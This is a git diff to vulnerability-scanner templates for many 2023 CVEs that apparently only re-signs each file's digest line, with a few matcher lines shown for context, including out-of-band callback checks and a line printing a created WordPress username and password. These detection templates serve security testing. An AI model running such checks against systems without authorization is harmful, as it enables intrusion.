4a0a00473045022100ab816efcbc5a7db8eacab493caab83f3dba6c09efceae69db79af63d2d711e3c02204b221648b2e6153a538e9fd48e38ff9a6a67590aa66a6b7a9e031080ffa9edc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b05003982cc5d539c962ab8df15b08afd1484933fdf8f7b332f1ae63a3101926022043b6b3618281d9ad5edbee8271c7e5f6d665e04d97324064ef18eed214421e0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index 49f04011f8..dedfb5267c 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -44,4 +44,4 @@ http: - contains_all(to_lower(interactsh_request), 'user-agent','curl') - status_code_1 == 302 condition: and -# digest: 4a0a0047304502200deafea4ba54747e5bf0550af972b71e8b94a3fb9846f463fd3084ad5465d5f9022100fcafaf89869758bc5c5e6f633b28dbdfbb2c9cecdd09bf18269b8681b083b713:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207aa0fac0e4628c0de249eac5b623c777c20e853d0ff13525bdb74c4a30bc00050220763758c1ceeba32ba3a3c0b04d1e078802f210bb0b08272ab82323da2edf0170:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26035.yaml b/http/cves/2023/CVE-2023-26035.yaml index 103c23a2f8..952b598ee5 100644 --- a/http/cves/2023/CVE-2023-26035.yaml +++ b/http/cves/2023/CVE-2023-26035.yaml @@ -57,4 +57,4 @@ http: - type: dsl dsl: - contains(interactsh_protocol, "dns") -# digest: 4a0a004730450221008b4a73452ed681a25f40c5d8e7147de5a1a677aa0219ecfccd0e91aa6d829e010220268da47753cbd7b38ff64871e15e81c9fea1d053df5af7339687863c544545f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d5871c917f51f34d6deee91a3087ffd937ba9f297849249880c00627f9f72b4e022100dd8947408e2038c92eabf9ea24e85a4faf1c9247ae248274ae33bda3702cd484:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index f61456c077..9fe41a81d3 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009eff1cfcd9afb5c04d7b263baaf2ff4faf43631d4e6eaf033ca3c6b8fd85de5d022060065320c9d8eac58e06f71ddabfeaecb433875fa230c89a4015e129415c44f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204eec07808c796fe47bd1c88eb1df93ec5716fd9073758a669e1322d7b6e4df9b02206ad2b2b3fc6a189cd1a49073e1e51761366c9425452997c29e3919cf59518e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index a68539f2c6..4b3b04e8b6 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f7621cf2a7737e42311ac572bb467a25f6560465b43af82ee9c969c46abe69702200c966cadb0385e22cc13c7c570a1cf029c3c48849d60dc56ac002c93b7bb9df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b63fae8c757a7959d9bca7e8411cd90e40d3badf4485ee9767b735866828278d022055c879e17b683bdc1c37ab1c29fb7bc38746fe1e757413ff76f152b1836f9dbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml index cf9c5d8316..e67b747c7f 100644 --- a/http/cves/2023/CVE-2023-26347.yaml +++ b/http/cves/2023/CVE-2023-26347.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ff9ea4c7bbd58eacf86b3cf227f3254dda5e64c7b988c29f30139e7ad99bb7a0022100e070f165193a71a78fb1a8a365556a407e03a9e1e1de475e39814e5196600017:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f483b6e768f5779f0b4be6bda01f39a5cf2258ee03626dc422824b072c4ed27022100f25722589eebbdd333b014b18de6e0dd8e7169033b5fef7a442b465ae8510cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index d92a6456fc..afbeaa7449 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -57,4 +57,4 @@ http: part: header words: - "text/html" -# digest: 4a0a0047304502205698995c249ffd4a99ec1e5e70748e5ff9b6672660456da63e2278057f774024022100cc2e426ca1958716eefc00654a4ef74b95883bc11134b574c4d717b24441305f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc335dc15804e170ba09bd4de98827d092ce77967b6719237bb645debf5e38100221009a253706430a21c94129f4866759a190637dd34b35c72dd62a2b1e0a84444cc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index a6e10da7f7..ae4d8808e5 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -73,4 +73,4 @@ http: name: csrf regex: - 'name="csrf_test_jorani" value="(.*?)"' -# digest: 490a0046304402200b60e70c837357ee28e98935c27bde05998b539897928baabec57666aed0b919022046a262ba1607e583c4f6c3b067a69772bd79b9667dbbb3502fbd54561a7b73dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d242b66bd8eb4a49f3a58f63f9c6f4636cbb06ed2385b224eb84a9a85fbafc7022100f669d3c8440de4b34277c09cef8b261b1bbd6dadbd1a721a75917f13fecba160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 163547e3ec..90172f6baa 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -61,4 +61,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100deca6566231b825072b920c7159063966ba0e0d72d70db60a9fa69ae05b1fbe5022073f4adad294645fff730e4db3d3115fd31616a4e889dc68aa57fbafd5817c833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204811c3399bdef9b6e0dd13a822ade7c6c9a78fa31bcbd88b7789937bc24c68150221008a9fefa1ec16084c87e7350bafea77fc13dc3b235e9ab50c4cc1728b4da014e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 7f6d4cbd1e..a1623a94d7 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -55,4 +55,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "ChurchCRM")' condition: and -# digest: 4b0a00483046022100a12d03c09c04ff3fd0eb21429cffd53dae7683b12ce3bbcf005f8d5e4320dfcd022100ac9beadeb589b7538505258a13544fe51ef33ad0ec8300d92680d1121b40dc06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2a837a350a382a25d524a78a59886d5543fbb00360d0e233939ca64c61aee710220045d3121c7563ac0e22c73421256f86098bb2235f4dc56cf35be3f7996b56d37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index cdaa5dd61b..b3bef1f57a 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b34b512d32b022e240aa98f18a8d87185f4225c0d321f534cfa85def4ee3bc8602202a38b89f5ae73498ed2709a3fd2ad2b98df29a16fc00c3b155cf941e5d1b3276:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100934ff1b637515e0ecac3d09098294f06bf8a897dc09a9afa8236f528a3e1c137022100e85cf931c8d91be0bd06a31f3274e5a0f59180d13ac05db24753b9198e2be862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index e4d40bdf61..14e0905fdb 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -63,4 +63,4 @@ http: regex: - ',"static_token":"([0-9a-z]+)",' internal: true -# digest: 4a0a00473045022100aa46ba83eaa1e937eb89a6c4296e4efd072af40a4bcf8e687f6f3ea2551ed66502204452a505bdad3d329e7fdb44f2aa4ad0a0be98e174650aed8a5f057d51935856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c8f4ed29d0095b7b570653f43172c909e18462ba144953cf4238d288cf0499ad02203b8e7489126202287ddad617939812b2ea43c464b639f7e41397993a0931643e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index f6edbc4ced..05662e23ae 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -80,4 +80,4 @@ http: - 'duration_1>=6' - 'contains(body_2, "Jms Blog")' condition: and -# digest: 4b0a0048304602210081fd270095a1404c3f7c68821fe46c6300eebf304f7a30088cec551889da6164022100ab7775c739fdba4a50da051bb34459f44f5affaff61c41d0febd3e14967c7bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100842f6d137227d9615048da5a7346e239d060859af380518f03f3b9afcc9d583102200f06aede5a783292f532ea71439283376b6140cade971197fc79d3dda174db61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index 1af99d4e59..e668a74cea 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -50,4 +50,4 @@ http: part: interactsh_request words: - "User-Agent: Appwrite-Server" -# digest: 4a0a0047304502210081af9d0fa841653c4d08863d80b449d96d7cc156c3cd2dfa6158234a730a4514022022d68c4ca6f83a4d3f5d24f0389e3e609c12a912a37a2a1382c063f62de56f7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009995c76e71bc9dfb63841aac9f371ad3473812dd9d9e92771f5127cb7ee8fcc7022100add03fbd8cf31aa10595f8064487e6171a3e858699f964a91273205cea0742f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index 36ae3a3da8..fcfc48d242 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ed098aec99fb6f0ef97db4bc8923c33d44632198533143bc0941afabc069043022100e2d8ea18692381c14fd9825ea2dcbe02f49906b3c573b05a4c7a4e74d4022dd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202dd93e61d0ee307383828e3dbd0fa3207ab6f177ec8cf63a020a7d73aaa4e3cb02206562c141f0747ae18fd56df1db0ad6e9536ecab905b947438d1242949676d43d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index e329de37bd..561a9c1e67 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f9f53e3e452787d9724750d3608ce6b68eb37eb2bed9e816ce331a5b6b096969022100a08d99c502029867566a633e6b96973ec21e625d67f3506e7a58117d32a30a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aae1076025375cd4ef97f803e224c4076f48a61930dd0dc46f0e499e6ccd48bb022100ee135b1050dfff3ee03dbae3fa46d613bbafaa2b9bb563a5f67239415f9fc369:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index e64e29d563..7f1c5ccad0 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022074722a892bf238338051f9fb3a47cce0886edc1d9d30ec3a5021c0ecd11006f1022076a0ddee63a3dd22874ab38c61f047339e761aec7e499fcc94cffa02f1c32b99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb38cf1cbc1e90a6a108d1281bf3d69f08d64d2e50b301b7b8bc260b5a67db880220087e68adec2ea336bf216752b26d541262e503c818cc970d153844c758d202ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index a0daffd738..3d4550d423 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -127,4 +127,4 @@ http: - 'erList\/selectPrinterCost&sp=([a-z0-9]+)">' internal: true part: body -# digest: 4a0a00473045022100c43bc6a64df519a04b0c32ae002356fe4d745056e646acc1f73d048219fc0fdd022019e36e542ac51a145ed37740864eba86659fd657e0d6d986377e75bd06ca13e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009d354896dfc5197fe175c60ac3dc9ca83dc8f744a1ee819b236565f07e2fa379022100bf100d32faa3748a2a5a7f3a3081e592dbc7cf1af921b4324074670798c5ebe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index 1ecb398ce8..bf59d9c052 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -72,4 +72,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body_2 -# digest: 490a004630440220786d7c2a2e607ddcae695760633ce2fa3d1f8acd176f947e34e32b3b6e979f780220653af3d4cfc548d7a3c4e8873b45fd038152bf4a4b6496bd1376574cc0129caf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210094f67b702cc3346ddeb9f5641612b4357b608a7123e2a256b7ac8e2f375e19cf022100a64f29ba036ca63f9ff74a922c545f9d67e1a805a5918b0537a0a9ac925d0ae0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index ea53e69211..a9759ecba1 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203099f51b6c29d9951ebbeea0226d34c46a55f9f81b5c49107101414fc2eab40902200dddf0dae1c97279adf3b04e93e7fbd9f74a481951149a2cdece3bc3ed44d82b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eaa8ac0a65182f730224ca3055081b5eea65437a110d340c07998585d06e7d9002207b2e5ea28e6be898073c10ec03572e130e6b7a59b9508c11d3b5c2a89a7ed554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index f8ee44170b..5f08488576 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -72,4 +72,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e9873ef2152bc24254405f66645dfe7d2f2126dd9d33407920ae3ac8b62a0f6e022100ea81d9a3cfab7defcab09ea9b1fc09ccb7090879ae84b763241e3f4c7896beac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc59900916f76334ed6ff60aca8ce461bebb9927501c28b0e3a1c48f78d8af820221008c131dec5fac44bd24a1e94075f0af16a26c6f41931e7326752ee81220d03ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index 1219284f81..8225a3ae90 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450221008e004c348a677bde325cd7abafaf76c6c1c5598d263de7b08ffedf49727b2bdb022051961d005e215d78fbc7abd5a6e925cf4a14ae704d246efec0d8522a611ea34f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e06b609fa75c61cfa4d104be047ab72148eb1f763831efbe742adcc8f53a159d02200e9faa3e0761679c4a28dc1848048b2b73bce8f1fd34848e8471ff1103f0b6f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27639.yaml b/http/cves/2023/CVE-2023-27639.yaml index 1dc64311e0..706e1d97ce 100644 --- a/http/cves/2023/CVE-2023-27639.yaml +++ b/http/cves/2023/CVE-2023-27639.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009203ff14f4788be7f710de96ec1e65ac2311d0637c4281a015d9226ca1709ea2022100a98a180fc53a625defdcb5d20cf9af65a80367a6b3038691639b348e439fcf35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220264ec173015f4ea1e9fb57f0cdf16a11941fa1565929316826a6469a7f26356b022100f9d06900340addad7bbbaa2d4df42eb4966fff7fe48485094749dff3fef84e7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27640.yaml b/http/cves/2023/CVE-2023-27640.yaml index 1d84f32c3b..b70e7ae6a4 100644 --- a/http/cves/2023/CVE-2023-27640.yaml +++ b/http/cves/2023/CVE-2023-27640.yaml @@ -38,4 +38,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(base64_decode(body), "PrestaShop", "") && contains(body_2, "facebook_urls")' condition: and -# digest: 4a0a00473045022100fbf4beb7caa46ad11a7ce26fdbfaa88016713b04d71ece5c2635a31913986a8a022003212b2b9c49bf77654e33bcb134a805bf48735fe3d357705f393d0f741b050e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205e3e768c0de86a746c4efad68576e82bc1fa30922c43c8345f523acf95f0f30e0221008f34d738ed0acf80b92b4989211cd0d3d817649036f5e72399ffc23ec8159866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 3a3c9cb5b6..7c973b8f15 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -70,4 +70,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 4b0a00483046022100b9f3f94f8eac8f481fa37610517d4174d804c15fb6c2366af1454af3e67d8f7f022100e00fda96533e49cc81cd52e25a7d17b134bf5201a894e857e353238bed1010fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9043550aed8b81e9ef9db8d60bdafbd3e317d5a4380bada21e2c40a59eb701202202e91c365dc6c67fdf939724bcad96bb24674d20e4b986917b5fa9c81195eb8af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml index 62ad02ec9a..c716a7e7ed 100644 --- a/http/cves/2023/CVE-2023-27922.yaml +++ b/http/cves/2023/CVE-2023-27922.yaml @@ -50,4 +50,4 @@ http: - 'contains(tolower(body_2), "_newsletter_")' - 'contains(body_2, ">")' condition: and -# digest: 4a0a00473045022100e506db446bbe84801062c7573c8d84d6ac3ac2ac861ce5c6e47276cdbfb77f59022037128f43f6e7c992b7095c03a9f8b44e439c994df9f4e8ad1656fd84df42dad1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9167be2b724059df7c707ba66c0e23021841497843387e22cea0938486d9c22022100b72c351c3b3cd00ab824a438f1cb818d13fbcabf2a0980ae0e165e839b80686a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index 8c1c66213e..bcf8ef4748 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210096c8ac8513c2959653cc0dbb1254ba29a23c8f656c9386fc58765c9cdfc94a3a022100e79e136345ab9f545e2ae7c9bddddd959e9663aa61fd706c65902efa636d7c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022004a22adc5e62f7794b752c4457a45b432b9e299bc1a0687fb7d826283467f0c102206da3d7c5151e2c6429db61cf12879cdc938473c651fd24f8188dfe64cbad202f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 761e2db016..fbeb5c48d0 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -74,4 +74,4 @@ http: dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password' -# digest: 4a0a0047304502201f8fb3d0297a76be68c1aaf7e1947bdcc2d20b4194a143aed488388dda746e1b022100eba2f04ded607ea70367c52c9db1c815ddcf252eb554d4b7413373f5073c53be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220628cd93a9f24e6da21aa191838a4414fde4b236271358e675d6292e2cfd6d9c60220242c94de0f75a7e3169ec197bf0a52235bf43e44525fe668bb487845ec35c26d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index fcd204123a..a2c633d558 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100867ffb49a0eda2059b75af70ac9ec0eda4767fde5735118fc96a82a2276abbeb022009ab8b1e54d2866629f2bc73bd048266c2f69b84c1c82c83d02e824b7ad2bae2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220748f6543ee77c349ea3b0c947703b6dddbefb5ef22d0d1f526df20906e14a39c022100df4ecac49f01e90b8646b10d421ba2ce78103f5e5e463bd9ac3a969625144f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 9dff7a231f..32f6ae8a7f 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022032320b6050dff9ab27355a70a59fc91e1a93cbcc3b7baf66112f6c7d2338fb980221009fecbd343a9c563dca53df1617986c480cc2132911bcf89cdfb687ecd9590ff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055aa8107bd7d4d0fff2c0e8689d5dcf8d5325b11639dbcf31479cb2207825612022100b4ee88e610a2506569a49715d63d2c174cd346a6cd0a86c303baf4e227a1bb3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 787dee5950..7fd7b59455 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -212,4 +212,4 @@ http: - '"url":"\/uploads\/([0-9a-z]+)\/' internal: true part: body -# digest: 4a0a00473045022100ce74731d4f03315a39203e3aa3775a80c5a82171b15cb8251c13b84816f869a502200e2fc502e7a3ab3a6d1d51fb7acb0c6a69777c3fb805501cc36ffdd30e3d4f27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf8fdde8726815d587a1a5a92c0a748c63b2c0ded1c58cd824f3b4e26b98ac0a02201495555a41cfb23fb565e0c5151f37c8257b5adc230d11c0a821899c594614f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index f585a3339a..4020684296 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206320054830cbf1ad38ede41ae779a7b91200b4c6551c8237690c44271c9427480220599f337a011a66a04ef3cf978324a583550dcb6ddf4d951d27099781fa04bb8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022007bff5910c7995c188ae6031143eb43d7170ad3caea04a1eb6ee71c0e026e29202201779c8cc2c73090961a6632e0d0309178e9e50be5f9c4145c926fecebe300cc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 5ca8a98bc4..3d6e1da347 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cc34538c0cf40fb3489d8f091c41bcf45f66c43266a4c6a2136aef40acbe67b702200d93d6082e5e272bc01f1e8222ec9521c32be40f912837b32aa6c0e6dcd75a2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f10317bc778c143c3d7478b59fe0b05d35be98354746dd591670fc3da0e14d1b022100cf2d8f74f7ce084df301605b9e617795d4618c88262e6f3ca007ba1480c1c520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index 29a46f059e..a46f1b5e89 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -60,4 +60,4 @@ http: - status_code == 500 - contains(body, 'critical error') condition: and -# digest: 490a00463044022021b0065afd452b596019be1f29280c7188acefb68b151f4424790005959092ce0220570d61411787677f1f9159c72796d6bda6e7f3213de0c8314053f75bea9749bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3031ce2694ea298cae571806359cd762818fe85e602bfbe76c2c2d7e0b228f00220120f98c33381b0abc660138bef1a04a77b197e0dc137498a4f1201bdd99c0769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index bd09147e59..12a44c9543 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "pagination\":")' condition: and -# digest: 490a0046304402204eaa8609f06c3eefd7564d1851a570331a2ac0bdf7ea82a8c2c34713f0b076f302201c7005deb51e36e71ebc1d754186d83f8bb170a0db558b3f6e3640044d4b2df4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eda48bd92500604d2c7f795dc9f29ad02cbd296ff04dd078f0ad9d0e756275d00221009f72e58aa25cb6db4550d529e6afade4404ed735bba95f58e3653646bafc1558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index 01974f4433..fb1465e52f 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -79,4 +79,4 @@ http: kval: - admpcsrf part: header -# digest: 4a0a00473045022002ea2f37839931bbb9a9c24fbf58223344569d7d295c6bd5820a686bf488e79e022100c8f6cf28389ef9d5215945629bfaefe1adc0cc3089553c0b049600c78a8be185:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b40c67a84b05f52a1cc250c89d9d44375d1a0c33d9f1bc54e9d63819b04e2e00220698ec8d0a6e93ac02207ffb5042b97f54896736e55568b992c616c8dc5924bb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 615ee4c5c7..77b69e710c 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -50,4 +50,4 @@ http: - status_code == 200 - len(trim_space(body)) == 106 